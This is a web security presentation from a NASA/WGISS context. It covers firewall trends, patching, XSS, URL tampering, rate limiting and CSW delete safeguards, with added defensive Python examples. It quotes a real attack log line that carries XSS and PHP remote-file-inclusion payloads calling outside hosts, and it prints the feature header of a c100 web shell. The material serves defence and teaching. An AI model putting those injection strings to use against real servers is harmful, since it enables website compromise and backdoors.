Security - wgiss


Security: Best Practices
GSFC: What we have seen
- 1990's: Very Porous (Non-Existent), Default Allow
- 2000's: Much Tighter, Default Deny
(Diagram: the Goddard "Firewall" between the outside and the GSFC servers. Restricted ports: 20, 21, 22, 23, 25, 80, 443. High ports: 1024-65535. Smaller attack surface, increased attack attempts.)
Two Major Trends
1. Increase in web services offered:
   - GCMD Web APIs
   - OGC Catalogue Services for Web (CSW)
   - Other CEOS and GEOSS services
2. Increase in web based attacks:
   - well known COTS or Open Source web vulnerabilities
   - attacks on in-house code
   - social engineering
The WGISS Community Dilemma
- We have a responsibility to serve our users
- We have a responsibility to collaborate
- The web is the best current mechanism
- But the use of web services may decrease our security posture
Solution:
- proactive security awareness
- use of security best practices
- communicating threats and solutions in our community
COTS/Open Source Software Vulnerabilities
Real World Examples: The Attack
Seen in Logs (Decoded):
83.217.66.50 - - [03/Sep/2007:05:56:51 -0400] "GET http://xxx.gsfc.nasa.gov/some.cgi?rcpt=http://ydfgsdfg.txt?=<script>alert("xxx");</script> Hello Admin! Today%20You're Being Hacked By Sys!<script>alert("Hacked By Sys");</script><?php include ("http://xyz.altervista.org/private2.txt?"); ?><ahref="<?php require ($files_dir.'/_custom_menu_link.php'); ?>"><?php require($files_dir.'/_custom_menu_name.php'); ?></<br><ahref="<?php require($files_dir.'/_custom_menu_name.php'); ?>prova</a><b>es_custom_menu.php?files_dir=http://xyz.altervista.org/private2.txt?<ahref="<?php require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?>prova1</a><br><a href="<?php require($files_dir.'http://paintweb.altervista.org/private2.txt?); ?">hacked</a><br><a href=<?php require($files_dir.'http://xyz.web.altervista.org/private2.txt?); ?>ha2cked</a><br>< href=page?= >ha2c3ked</a><br><a href=asd?page= >ha2c3keed</a><br>asd?page=http://xxx.altervista.org/private2.txt? HTTP/1.1" 200 31477 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6" TCP_MISS:DIRECT
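The log entry above carries three distinct things in one request: a reflected script tag, inline PHP, and parameters pointing at a remote .txt file. As an added example (not GSFC's tooling), this Python log-review check parses a combined-format line, URL-decodes the request and reports which of those indicators it contains; the sample line is a constructed, abbreviated copy of the entry above and the pattern names are mine.

```python
import re
from urllib.parse import unquote

# Constructed, abbreviated copy of the decoded proxy log entry shown above: the
# host, rcpt= and files_dir= parameters, status and user agent are kept, the
# long repeated injected HTML is cut out.
SAMPLE_LOG = (
    '83.217.66.50 - - [03/Sep/2007:05:56:51 -0400] "GET '
    'http://xxx.gsfc.nasa.gov/some.cgi?rcpt=http://ydfgsdfg.txt?=<script>alert("xxx");</script>'
    " Hello Admin! Today%20You're Being Hacked By Sys!"
    '<?php include ("http://xyz.altervista.org/private2.txt?"); ?>'
    ' es_custom_menu.php?files_dir=http://xyz.altervista.org/private2.txt? HTTP/1.1"'
    ' 200 31477 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1.6)'
    ' Gecko/20070725 Firefox/2.0.0.6" TCP_MISS:DIRECT'
)

# Combined-log prefix: client, identd, user, [timestamp], "METHOD request HTTP/x.y", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<req>.*?) HTTP/\d\.\d" (?P<status>\d{3})'
)

# Indicators of the three things the logged request tries (pattern names are mine).
INDICATORS = {
    "xss_script_tag": re.compile(r"<\s*script\b", re.I),
    "php_code_injection": re.compile(r"<\?php", re.I),
    "remote_file_inclusion": re.compile(r"[?&]\w+=https?://", re.I),
}

def analyse(line):
    """Parse one log line and return client, status and matched indicators,
    or None if the line is not a request log entry."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice so %253C-style double encoding cannot hide a tag from the patterns.
    decoded = unquote(unquote(m.group("req")))
    hits = sorted(name for name, pat in INDICATORS.items() if pat.search(decoded))
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "indicators": hits,
        # a 200 means the CGI accepted the request: worth an immediate look
        "served": m.group("status") == "200" and bool(hits),
    }

if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```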
Real World Examples: the Payload
Payload at http://xyz.altervista.org/private2.txt:
<?php
/*******************************************************************************
* Locus7s Modified c100 Shell
* Beta v. 1.0a - Project x2300
* Written by #ophAcker team
* Modified by error & Be_gO
* Re-Modified by #error_maker (15.2.07)
*========================================================
* New Modifications Implemented -* -Added link to Enumerate to escalate priviledges
* -Added Rootshell.c
* -Added Rootshell.c;auto-compiler
* -Execute Rootshell.c
* -Added Mig-Log Logcleaner
* -Execute Mig-Log Logcleaner
* -milw0rm searcher (Grabs OS and searches milw0rm)
* -Locus7s Style & Image
* -Added w4ck1ng Shell Backdoor Connect and Backdoor
* -Added PHP-Proxy link to hide you
* -Added your ip and server ip with whois capability
* -Added private 0day released by allahaka which utilizes the linux
* sudo bash to execute a stack overflow. (Continued)
Best Practices: COTS/OSS
- Wisely choose COTS/OSS Web Applications
  - what is the security record?
  - is the software maintained?
- Stay on top of software security patches
  - schedule regular maintenance checks
  - remotely audit for security vulnerabilities
- Limit access
  - does this application need to be open to the world?
  - can authentication be used?
- Review your Logs
In-House Web Application Software Vulnerabilities
Real World Example: Defacement
NASA:
- "Astrology"
- High value
- Soft target
Examples:
- HTML manipulation
- XSS
- SQL injection
- Element manipulation (example):
  <img src="http://site/cgi/image-resizer.cgi?url=jpl.nasa.gov%2Fgalaxy.jpg">
  http://site/cgi/image-resizer.cgi?url=mysite.com%2Fnasacalc.jpg
Source: apod.nasa.gov
Real World Example: Defacement (Best Practices)
Defense:
- Hash Table (flatfile or database)
  Key = 123221  Value = "url=jpl.nasa.gov%2Fgalaxy.jpg"
  URL = http://site/cgi/image-resizer.cgi?url=123221
- Encrypted Hash Function (algorithmic)
  "jpl.nasa.gov%2Fgalaxy.jpg" -> hash function -> ADGCDDARG
  URL = http://site/cgi/image-resizer.cgi?url=ADGCDDARG
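Both defences above replace the raw URL in the link with a reference only the server can issue. The following Python is an added example (not the site's CGI code) of the two side by side: a lookup table keyed like the slide's 123221, and a keyed hash (HMAC) in place of the unspecified "hash function". It also shows the caveat the slide leaves implicit: a hash cannot be reversed into a URL, so the hash variant still needs an allow list to resolve against. The allow list and secret are constructed.

```python
import hmac
import hashlib

ALLOWED_IMAGES = [  # constructed allow list of images the site really serves
    "jpl.nasa.gov/galaxy.jpg",
    "apod.nasa.gov/apod/image/nebula.jpg",
]
BASE = "http://site/cgi/image-resizer.cgi?url="

# 1. Hash table: opaque key in the link, real URL stored server side.
_table = {}

def register(url):
    """Store url under a new key and return the link to publish."""
    key = str(123221 + len(_table))   # sequential, like the slide's 123221; predictability
    _table[key] = url                 # is harmless because only registered URLs resolve
    return BASE + key

def resolve_key(key):
    """URL to fetch for a key; None for anything register() never issued."""
    return _table.get(key)

# 2. Keyed hash: the link carries HMAC(secret, url). Nothing is stored per link,
#    but the server cannot invert the tag, so it recomputes the tag of each
#    allowed image and fetches the one that matches.
SECRET = b"constructed-demo-secret"   # in production a per-deployment random key

def tag(url):
    return hmac.new(SECRET, url.encode(), hashlib.sha256).hexdigest()[:16]

def link_for(url):
    return BASE + tag(url)

def resolve_tag(t):
    for url in ALLOWED_IMAGES:
        if hmac.compare_digest(tag(url).encode(), t.encode()):
            return url
    return None   # unknown or forged tag: refuse to fetch anything

if __name__ == "__main__":
    print(register("jpl.nasa.gov/galaxy.jpg"), link_for("jpl.nasa.gov/galaxy.jpg"))
    # the defacement attempt from the slide resolves to nothing under either scheme
    print(resolve_key("mysite.com%2Fnasacalc.jpg"), resolve_tag(tag("mysite.com/nasacalc.jpg")))
```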
(Figure: Cross Site Scripting (XSS) Example. Source: msdn2.microsoft.com)
Cross Site Scripting Defences
Best Practices:
- Understand the types of XSS attacks
  - client side (e.g. javascript vulnerabilities)
  - non-persistent (e.g. error messages)
  - persistent (e.g. bulletin boards)
- Validate user input
- Utilize software security libraries
- Limit access
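The non-persistent case is exactly what the logged some.cgi?rcpt= request probes: an error message that echoes the parameter back. As an added example (not GSFC's CGI), the Python below shows the vulnerable handler beside a hardened one that validates the parameter against the format it is meant to carry (a mail address, an assumption here) and encodes on output with the standard library.

```python
import html
import re
from urllib.parse import parse_qs

def error_page_vulnerable(query_string):
    rcpt = parse_qs(query_string).get("rcpt", [""])[0]
    # the rejected value is echoed verbatim, so a <script> in rcpt runs in the visitor's browser
    return f"<p>Error: could not deliver to {rcpt}</p>"

# Accept only what the parameter is meant to carry: a plain mail address (assumed format).
RCPT_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def error_page_hardened(query_string):
    rcpt = parse_qs(query_string).get("rcpt", [""])[0]
    if not RCPT_RE.match(rcpt):
        # validate: do not echo the rejected value at all
        return "<p>Error: invalid recipient</p>"
    # encode on output anyway (defence in depth, using the standard library)
    return f"<p>Error: could not deliver to {html.escape(rcpt, quote=True)}</p>"

if __name__ == "__main__":
    probe = "rcpt=<script>alert(1)</script>"
    print(error_page_vulnerable(probe))
    print(error_page_hardened(probe))
```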
General Best Practices
Best Practice: Perform Regular Security Audits
Examples:
- NMAP for network and service audits
  - OS detection
  - service version detection
- NESSUS for security scans
  - scans for all network vulnerabilities
  - commercial support available
- Nikto for specific web vulnerabilities
  - over 3500 dangerous files/CGIs
  - over 250 web server vulnerabilities
- Intrusion Detection System Reporting
Best Practice: Limiting Access
- Incorporate Authentication
- Specify Allow/Deny Directives
- Utilise Firewall Rules
- Implement Rate limiting

Iptables (Linux) example (rules of a user-defined chain named SSH; the traffic to be limited must first be sent into it, e.g. -A INPUT -p tcp --dport 22 -j SSH):
# remember the source address in the xt_recent list named WEB
-A SSH -m recent --set --name WEB
# drop the packet once the same source has exceeded 600 hits within 60 seconds
# (--rttl additionally requires the TTL to match the packet that hit --set, which resists spoofed sources)
-A SSH -m recent --update --seconds 60 --hitcount 600 --rttl --name WEB -j DROP
# everything below the threshold is accepted
-A SSH -j ACCEPT
Caveat: xt_recent limits --hitcount to its ip_pkt_list_tot module parameter (default 20), so a threshold of 600 needs that parameter raised when the module is loaded.
Best Practice: Understand the Software
Apache: Compile your own

Manually compiled server, with rewrite, alias, and proxy added (all static):
core, mod_access, mod_auth, mod_include, mod_log_config, mod_env, mod_setenvif, mod_proxy, proxy_connect, proxy_ftp, proxy_http, prefork, http_core, mod_mime, mod_status, mod_autoindex, mod_asis, mod_cgi, mod_negotiation, mod_dir, mod_imap, mod_actions, mod_userdir, mod_alias, mod_rewrite, mod_so
Disadvantage: No RedHat RPM Updates

Loaded modules in the default RedHat 5.1 httpd:
static: core_module, mpm_prefork_module, http_module, so_module
shared: auth_basic_module, auth_digest_module, authn_file_module, authn_alias_module, authn_anon_module, authn_dbm_module, authn_default_module, authz_host_module, authz_user_module, authz_owner_module, authz_groupfile_module, authz_dbm_module, authz_default_module, ldap_module, authnz_ldap_module, include_module, log_config_module, logio_module, env_module, ext_filter_module, mime_magic_module, expires_module, deflate_module, headers_module, usertrack_module, setenvif_module, mime_module, dav_module, status_module, autoindex_module, info_module, dav_fs_module, vhost_alias_module, negotiation_module, dir_module, actions_module, speling_module, userdir_module, alias_module, rewrite_module, proxy_module, proxy_balancer_module, proxy_ftp_module, proxy_http_module, proxy_connect_module, cache_module, suexec_module, disk_cache_module, file_cache_module, mem_cache_module, cgi_module, version_module, proxy_ajp_module
Best Practice: Understand the Software (cont.)
OpenGIS® Catalogue Services Specification, Page 168
10.11.3.4 Delete action
The following XML Schema fragment defines a delete action:
<xsd:complexType name="DeleteType" id="DeleteType">
<xsd:sequence>
<xsd:element ref="csw:Constraint" minOccurs="1" maxOccurs="1"/>
</xsd:sequence>
<xsd:attribute name="typeName" type="xsd:anyURI" use="optional"/>
<xsd:attribute name="handle" type="xsd:ID" use="optional"/>
</xsd:complexType>
The <Delete> element contains a <csw:Constraint> element (see Subclause 10.3.7) that identifies a set of
records that are to be deleted from the catalogue. The <csw:Constraint> element shall be specified in
order to prevent every record in the catalogue from inadvertently being deleted.
The typeName attribute is used to specify the collection name from which records will be deleted.
The handle attribute is described in subclause 10.11.3.2.
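The point of quoting the spec is that the <csw:Constraint> is mandatory precisely so that a Delete cannot empty the catalogue; a server that does not validate transactions against the schema has to enforce that itself. As an added example (not from the OGC specification or any catalogue product), this Python guard parses a csw:Transaction and rejects Delete actions without a usable constraint. The sample transactions are constructed; the CSW 2.0.2 and OGC filter namespaces are the standard ones.

```python
import xml.etree.ElementTree as ET

CSW = "http://www.opengis.net/cat/csw/2.0.2"   # CSW 2.0.2 namespace
OGC = "http://www.opengis.net/ogc"             # OGC filter namespace

def check_delete_actions(transaction_xml):
    """Return a list of problems found in the Delete actions; empty means accept."""
    root = ET.fromstring(transaction_xml)
    problems = []
    for i, delete in enumerate(root.iter(f"{{{CSW}}}Delete")):
        constraint = delete.find(f"{{{CSW}}}Constraint")
        if constraint is None:
            problems.append(f"Delete #{i}: missing csw:Constraint")
        elif len(constraint) == 0:   # no ogc:Filter / csw:CqlText child
            problems.append(f"Delete #{i}: csw:Constraint has no filter")
    return problems

# Constructed transactions: one deleting a single identified record, and two
# malformed ones that a schema-unaware server might otherwise execute.
GOOD = f"""<csw:Transaction service="CSW" version="2.0.2" xmlns:csw="{CSW}" xmlns:ogc="{OGC}">
  <csw:Delete typeName="csw:Record">
    <csw:Constraint version="1.1.0">
      <ogc:Filter><ogc:PropertyIsEqualTo>
        <ogc:PropertyName>dc:identifier</ogc:PropertyName>
        <ogc:Literal>urn:example:record-1</ogc:Literal>
      </ogc:PropertyIsEqualTo></ogc:Filter>
    </csw:Constraint>
  </csw:Delete>
</csw:Transaction>"""
NO_CONSTRAINT = f"""<csw:Transaction service="CSW" version="2.0.2" xmlns:csw="{CSW}">
  <csw:Delete typeName="csw:Record"/>
</csw:Transaction>"""
EMPTY_CONSTRAINT = f"""<csw:Transaction service="CSW" version="2.0.2" xmlns:csw="{CSW}">
  <csw:Delete typeName="csw:Record"><csw:Constraint version="1.1.0"/></csw:Delete>
</csw:Transaction>"""

if __name__ == "__main__":
    for name, doc in ("GOOD", GOOD), ("NO_CONSTRAINT", NO_CONSTRAINT), ("EMPTY_CONSTRAINT", EMPTY_CONSTRAINT):
        print(name, check_delete_actions(doc) or "accepted")
```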
Other Best Practices
- Security in depth
  - multiple mechanisms for limiting access
  - multiple authentication mechanisms
- Understand trust relationships
  - with other projects
  - with other agencies
- Focus on data integrity
  - Good, reliable, tested backups
  - Prevent data misuse or misattribution
- Employ a knowledgeable, dependable staff
Conclusion
- The scientific community depends on the quality and accuracy of the data
- With the proliferation and interdependence of web services, the assurance that those services are accurate and secure becomes increasingly critical
- The introduction of one security flaw into a web services based architecture could have a widespread, international impact